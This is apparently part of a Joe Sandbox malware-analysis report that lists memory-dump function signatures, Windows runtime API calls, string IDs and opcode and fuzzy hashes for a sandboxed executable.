                                                                        • Source File: 00000003.00000002.2192397900.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                        • Associated: 00000003.00000002.2192380896.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192426292.0000000000BE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192445912.0000000000BEE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192463017.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192477489.0000000000BF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ba0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: Cpp_errorThrow_std::_$CurrentThread
                                                                        • String ID: E+$F+$F+
                                                                        • API String ID: 2261580123-1602586302
                                                                        • Opcode ID: a8adc69b0c7d64c7cab5c01f76fe6622a7a8dc088375b32aa8374e5731e1dfde
                                                                        • Instruction ID: b2aa4a93d0e30dca9682f375417a6c91e31c2251ffed686d196d5fdc5e1dd64d
                                                                        • Opcode Fuzzy Hash: a8adc69b0c7d64c7cab5c01f76fe6622a7a8dc088375b32aa8374e5731e1dfde
                                                                        • Instruction Fuzzy Hash: 6921C834608301EBDE206658D8D276E73D4EBE6710F1409BEF55ACB761D7F2DC448A4A
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2192397900.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                        • Associated: 00000003.00000002.2192380896.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192426292.0000000000BE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192445912.0000000000BEE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192463017.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192477489.0000000000BF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ba0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: __freea$__alloca_probe_16$Info
                                                                        • String ID:
                                                                        • API String ID: 127012223-0
                                                                        • Opcode ID: 8be0ef747ae67bd5bee685223a2bbb8433ab45fbfebd03fe93372ebdcdedb8ff
                                                                        • Instruction ID: 62d712a869590bb4e9005b221ba5ae7a49767358df225b51cccd0be0300247a0
                                                                        • Opcode Fuzzy Hash: 8be0ef747ae67bd5bee685223a2bbb8433ab45fbfebd03fe93372ebdcdedb8ff
                                                                        • Instruction Fuzzy Hash: 81718272904246AADB219F94CC81FBEB7E6DF49710F1800EBE915BB341F635DD418760
                                                                        APIs
                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 00BC1414
                                                                        • __alloca_probe_16.LIBCMT ref: 00BC1440
                                                                        • MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 00BC147F
                                                                        • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00BC149C
                                                                        • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00BC14DB
                                                                        • __alloca_probe_16.LIBCMT ref: 00BC14F8
                                                                        • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00BC153A
                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00BC155D
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2192397900.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                        • Associated: 00000003.00000002.2192380896.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192426292.0000000000BE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192445912.0000000000BEE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192463017.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192477489.0000000000BF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ba0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: ByteCharMultiStringWide$__alloca_probe_16
                                                                        • String ID:
                                                                        • API String ID: 2040435927-0
                                                                        • Opcode ID: 3ea1bdda40152d78d3d23510f5da595081b61fe8f8cf807eec42be485a674dee
                                                                        • Instruction ID: 2634fd599d171369309a3853a0e8745e3d1dfef0827e5737c71c89cd20797ead
                                                                        • Opcode Fuzzy Hash: 3ea1bdda40152d78d3d23510f5da595081b61fe8f8cf807eec42be485a674dee
                                                                        • Instruction Fuzzy Hash: 3F519372A10206AFDB208F98CC85FAF7BF9EB96750F144899F915A6151DB30CD11CBA0
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2192397900.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                        • Associated: 00000003.00000002.2192380896.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192426292.0000000000BE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192445912.0000000000BEE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192463017.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192477489.0000000000BF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ba0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: _strrchr
                                                                        • String ID:
                                                                        • API String ID: 3213747228-0
                                                                        • Opcode ID: 2e8523f9e199b17f6625ed6c0ffad96a4a1d4108d1d5b5e50c5b311801a702c8
                                                                        • Instruction ID: e6f11dc681eaffff30e7844435bd472cbb93a1f92af42d013439321d173f15c8
                                                                        • Opcode Fuzzy Hash: 2e8523f9e199b17f6625ed6c0ffad96a4a1d4108d1d5b5e50c5b311801a702c8
                                                                        • Instruction Fuzzy Hash: A8B10432A053959FDB268F64CC81BAAFBE5EF65310F1441E7E904AB382F6759D01C7A0
                                                                        APIs
                                                                        • _ValidateLocalCookies.LIBCMT ref: 00BC2517
                                                                        • ___except_validate_context_record.LIBVCRUNTIME ref: 00BC251F
                                                                        • _ValidateLocalCookies.LIBCMT ref: 00BC25A8
                                                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 00BC25D3
                                                                        • _ValidateLocalCookies.LIBCMT ref: 00BC2628
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2192397900.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                        • Associated: 00000003.00000002.2192380896.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192426292.0000000000BE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192445912.0000000000BEE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192463017.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192477489.0000000000BF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ba0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                        • String ID: csm
                                                                        • API String ID: 1170836740-1018135373
                                                                        • Opcode ID: 0778404a348e329fd75feb148ba6d6ad9923a30daf8a4948f05a14ef55cc87f8
                                                                        • Instruction ID: 677041ae42cdb70637612506fa9f29bbac6c13111356a430da3372795bc69eb0
                                                                        • Opcode Fuzzy Hash: 0778404a348e329fd75feb148ba6d6ad9923a30daf8a4948f05a14ef55cc87f8
                                                                        • Instruction Fuzzy Hash: 9E41D234A00258DBCF14DF68C895F9EBBE5EF44324F1481E9E8289B352DB71EA41CB91
                                                                        APIs
                                                                        • FreeLibrary.KERNEL32(00000000,?,00BD07C0,00BC990C,0000000C,00000000,C0C2D04E,00000000,?,00BD043E,00000022,FlsSetValue,00BE2EF8,00BE2F00,C0C2D04E), ref: 00BD0772
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2192397900.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                        • Associated: 00000003.00000002.2192380896.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192426292.0000000000BE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192445912.0000000000BEE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192463017.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192477489.0000000000BF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ba0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: FreeLibrary
                                                                        • String ID: api-ms-$ext-ms-
                                                                        • API String ID: 3664257935-537541572
                                                                        • Opcode ID: 912375338e29d364a1202794166a3aa307801e5e4141fc544aec135a7ef0da74
                                                                        • Instruction ID: 491d9150e751629b9d0fefe7d464c514121266c3654fc0ae431b4e402a100a18
                                                                        • Opcode Fuzzy Hash: 912375338e29d364a1202794166a3aa307801e5e4141fc544aec135a7ef0da74
                                                                        • Instruction Fuzzy Hash: 3E21D835A11311ABDB21AB65DC85B5ABBD8EF51760F2501A2E825AF391FB30FD01CED0
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2192397900.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                        • Associated: 00000003.00000002.2192380896.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192426292.0000000000BE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192445912.0000000000BEE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192463017.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192477489.0000000000BF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ba0000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 69d185699df5c6ad7715a9b12144ae20d9df36e52225e32b76916340d28eae88
                                                                        • Instruction ID: 30cec61593b76ba7f57e15a71230fa1d52ca4efbf03ed7eafe6641808429d6a5
                                                                        • Opcode Fuzzy Hash: 69d185699df5c6ad7715a9b12144ae20d9df36e52225e32b76916340d28eae88
                                                                        • Instruction Fuzzy Hash: 53B10F70A04249AFDB11DF98D884BBEFBF1EF55325F1441DAE4049B392EB709941CBA0
                                                                        APIs
                                                                        • GetLastError.KERNEL32(?,?,00BCD1E3,00BC22AA,00BC0E9D), ref: 00BCD1FA
                                                                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00BCD208
                                                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00BCD221
                                                                        • SetLastError.KERNEL32(00000000,00BCD1E3,00BC22AA,00BC0E9D), ref: 00BCD273
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2192397900.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                        • Associated: 00000003.00000002.2192380896.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192426292.0000000000BE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192445912.0000000000BEE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192463017.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192477489.0000000000BF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ba0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorLastValue___vcrt_
                                                                        • String ID:
                                                                        • API String ID: 3852720340-0
                                                                        • Opcode ID: ed50d7d04ead9736d569fcad29e897fdec22ad90ecbac57f9c1ed49f07ec0f0d
                                                                        • Instruction ID: 2d036e07d21792b1dec88b30f9127f7de0eed5c2fa5798030333d3514b5eec95
                                                                        • Opcode Fuzzy Hash: ed50d7d04ead9736d569fcad29e897fdec22ad90ecbac57f9c1ed49f07ec0f0d
                                                                        • Instruction Fuzzy Hash: 7201D83A1097115EA7242674FCC6E2B6FC4EB01B78B2002BEF5348E1E5FF62CC029540
                                                                        APIs
                                                                        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,BB40E64E,?,?,00000000,00BDFB57,000000FF,?,00BC7B9D,00BC7A84,?,00BC7C39,00000000), ref: 00BC7B11
                                                                        • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00BC7B23
                                                                        • FreeLibrary.KERNEL32(00000000,?,?,00000000,00BDFB57,000000FF,?,00BC7B9D,00BC7A84,?,00BC7C39,00000000), ref: 00BC7B45
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2192397900.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                        • Associated: 00000003.00000002.2192380896.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192426292.0000000000BE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192445912.0000000000BEE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192463017.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192477489.0000000000BF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ba0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                                        • String ID: CorExitProcess$mscoree.dll
                                                                        • API String ID: 4061214504-1276376045
                                                                        • Opcode ID: 1c0d962fb5e748d3c7ad5a7532ecb09e72bd2076295a4b3bbd5672dafc482201
                                                                        • Instruction ID: 964288a6d67e3810e3cd399903337c744b16583513ce5f7a7003d7c7c07463dd
                                                                        • Opcode Fuzzy Hash: 1c0d962fb5e748d3c7ad5a7532ecb09e72bd2076295a4b3bbd5672dafc482201
                                                                        • Instruction Fuzzy Hash: A7018F31944699AFDB018B94CC55FAEBBF8FB04B10F000569E821A32A0DF74A800CA80
                                                                        APIs
                                                                        • ___std_exception_destroy.LIBVCRUNTIME ref: 00BAD0FC
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2192397900.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                        • Associated: 00000003.00000002.2192380896.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192426292.0000000000BE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192445912.0000000000BEE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192463017.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192477489.0000000000BF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ba0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: ___std_exception_destroy
                                                                        • String ID: pE\&$pE\&$pE\&$pE\&
                                                                        • API String ID: 4194217158-2012766030
                                                                        • Opcode ID: fe6d4e7400144646b94ae28f85fdade90fc919945505715735f8c41800b898b9
                                                                        • Instruction ID: 04092c1a22c49d464a69ea900551faa73e7c6369ec0ceb04f2cee63d728efeb8
                                                                        • Opcode Fuzzy Hash: fe6d4e7400144646b94ae28f85fdade90fc919945505715735f8c41800b898b9
                                                                        • Instruction Fuzzy Hash: B101A4F5D182108BCA10AB18E8C2A6A72F0EB56714F050CBAF447EB310E772DC55C79B
                                                                        APIs
                                                                        • __alloca_probe_16.LIBCMT ref: 00BD0F0A
                                                                        • __alloca_probe_16.LIBCMT ref: 00BD0FD3
                                                                        • __freea.LIBCMT ref: 00BD103A
                                                                          • Part of subcall function 00BCF779: HeapAlloc.KERNEL32(00000000,00000000,00BC990C,?,00BD97AE,C0C2D04E,00000000,?,00BD5F80,00000000,00BC990C,?,EDF9CBD8,?,?,00BC99E6), ref: 00BCF7AB
                                                                        • __freea.LIBCMT ref: 00BD104D
                                                                        • __freea.LIBCMT ref: 00BD105A
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2192397900.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                        • Associated: 00000003.00000002.2192380896.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192426292.0000000000BE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192445912.0000000000BEE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192463017.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192477489.0000000000BF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ba0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: __freea$__alloca_probe_16$AllocHeap
                                                                        • String ID:
                                                                        • API String ID: 1096550386-0
                                                                        • Opcode ID: 6ee74ecf115157bc4b25e7049bf49c2b3bd0fc24d5ac3cec69e821ca44642a40
                                                                        • Instruction ID: e499e67c38b2cf447c872f8015a758e3404bbd7a7fb215bb463ff9706165f3c3
                                                                        • Opcode Fuzzy Hash: 6ee74ecf115157bc4b25e7049bf49c2b3bd0fc24d5ac3cec69e821ca44642a40
                                                                        • Instruction Fuzzy Hash: 0251F772610246BFEB216F68DC81EBBBAE9EF44710F1409AEFD04D6241FB35CC509660
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2192397900.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                        • Associated: 00000003.00000002.2192380896.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192426292.0000000000BE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192445912.0000000000BEE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192463017.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192477489.0000000000BF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ba0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$Facet_H_prolog3Lockit::_Lockit::~_Registercodecvt
                                                                        • String ID:
                                                                        • API String ID: 738035616-0
                                                                        • Opcode ID: 3d65d35d4850c8a089f811c44894d24ddf825a582cc6d9d117bf7dd0558b8024
                                                                        • Instruction ID: 5e0cfa6af5ce9bbcb86bbcfd8641ac382eca39945dc4529d143c4c451c7dd57f
                                                                        • Opcode Fuzzy Hash: 3d65d35d4850c8a089f811c44894d24ddf825a582cc6d9d117bf7dd0558b8024
                                                                        • Instruction Fuzzy Hash: D3016D3291421A9BCB05FB64C895BFE77F1BF94320F64049DE421AB3A2DF749A01CB94
                                                                        APIs
                                                                        • EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,00BCDDD5,?,?,00000000,00000000,00000000,?), ref: 00BCDEF4
                                                                        • CatchIt.LIBVCRUNTIME ref: 00BCDFDA
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2192397900.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                        • Associated: 00000003.00000002.2192380896.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192426292.0000000000BE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192445912.0000000000BEE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192463017.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192477489.0000000000BF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ba0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: CatchEncodePointer
                                                                        • String ID: MOC$RCC
                                                                        • API String ID: 1435073870-2084237596
                                                                        • Opcode ID: 2c223a3a4b83b270526c680d847178e6d9d7814d5303b03f38c6e6e975337fc6
                                                                        • Instruction ID: 8e7b59ff5e70292b9a45e4d346dd88dd3d69feb1435e39ff74ddf79f540b7579
                                                                        • Opcode Fuzzy Hash: 2c223a3a4b83b270526c680d847178e6d9d7814d5303b03f38c6e6e975337fc6
                                                                        • Instruction Fuzzy Hash: 19413236900209AFCF16DF98C981EAEBBF5FF48304F1981ADF906A6221D335A950DB50
                                                                        APIs
                                                                        • __EH_prolog3.LIBCMT ref: 00BBF4C0
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00BBF4CD
                                                                        • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00BBF50A
                                                                          • Part of subcall function 00BBECB7: _Yarn.LIBCPMT ref: 00BBECD6
                                                                          • Part of subcall function 00BBECB7: _Yarn.LIBCPMT ref: 00BBECFA
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2192397900.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                        • Associated: 00000003.00000002.2192380896.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192426292.0000000000BE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192445912.0000000000BEE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192463017.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192477489.0000000000BF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ba0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: Yarnstd::_$H_prolog3Locinfo::_Locinfo_ctorLockitLockit::_
                                                                        • String ID: bad locale name
                                                                        • API String ID: 482894088-1405518554
                                                                        • Opcode ID: 89f93c2ea09f2e125a5299a91d1a9e53f9b1cf3dce7e9013ec5a35f036a5a45d
                                                                        • Instruction ID: 1d6ffabb570f23a6ae3ac9ec79956cb5960e6e4bda35046fd22430dca543b669
                                                                        • Opcode Fuzzy Hash: 89f93c2ea09f2e125a5299a91d1a9e53f9b1cf3dce7e9013ec5a35f036a5a45d
                                                                        • Instruction Fuzzy Hash: AB014F71905B849EC730DF7A848159AFEF0BF28300B548AAEE09E93B52C770A644CB59
                                                                        APIs
                                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00BDA18D,00000000,?,00BF0D38,?,?,?,00BDA0C4,00000004,InitializeCriticalSectionEx,00BE34F4,00BE34FC), ref: 00BDA0FE
                                                                        • GetLastError.KERNEL32(?,00BDA18D,00000000,?,00BF0D38,?,?,?,00BDA0C4,00000004,InitializeCriticalSectionEx,00BE34F4,00BE34FC,00000000,?,00BCE0FC), ref: 00BDA108
                                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00BDA130
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2192397900.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                        • Associated: 00000003.00000002.2192380896.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192426292.0000000000BE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192445912.0000000000BEE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192463017.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192477489.0000000000BF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ba0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: LibraryLoad$ErrorLast
                                                                        • String ID: api-ms-
                                                                        • API String ID: 3177248105-2084034818
                                                                        • Opcode ID: 430a7bec89523e39a5d28f7e3926d93d01f726ff5114bd24f5c3b350ebaff24e
                                                                        • Instruction ID: 0da821cf3428f32fb84bac1e1d0a367be66a9091cc28dc0957817bef42ffa021
                                                                        • Opcode Fuzzy Hash: 430a7bec89523e39a5d28f7e3926d93d01f726ff5114bd24f5c3b350ebaff24e
                                                                        • Instruction Fuzzy Hash: 08E04F30280348BBEF202FA1EC46B1A7ED4FB21B41F144461F90CF91E1FB62A9518985
                                                                        APIs
                                                                        • GetConsoleOutputCP.KERNEL32(BB40E64E,00000000,00000000,?), ref: 00BD7380
                                                                          • Part of subcall function 00BCF889: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00BD1030,?,00000000,-00000008), ref: 00BCF8EA
                                                                        • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00BD75D2
                                                                        • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00BD7618
                                                                        • GetLastError.KERNEL32 ref: 00BD76BB
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2192397900.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                        • Associated: 00000003.00000002.2192380896.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192426292.0000000000BE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192445912.0000000000BEE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192463017.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192477489.0000000000BF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ba0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                        • String ID:
                                                                        • API String ID: 2112829910-0
                                                                        • Opcode ID: 4964a660f8f4bb35089afcd26bafb1ee81571e6a90a1c5770e2e19f8cc9c59a3
                                                                        • Instruction ID: 927dd05c79540adc77f007b8d4b92a6c8c58bf1ab5dcb4700cc243a7c097ff52
                                                                        • Opcode Fuzzy Hash: 4964a660f8f4bb35089afcd26bafb1ee81571e6a90a1c5770e2e19f8cc9c59a3
                                                                        • Instruction Fuzzy Hash: BCD15975D046489FCB15CFA8D884AEDFBF5EF09314F2845AAE816EB351FA30A941CB50
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2192397900.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                        • Associated: 00000003.00000002.2192380896.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192426292.0000000000BE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192445912.0000000000BEE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192463017.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2192477489.0000000000BF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
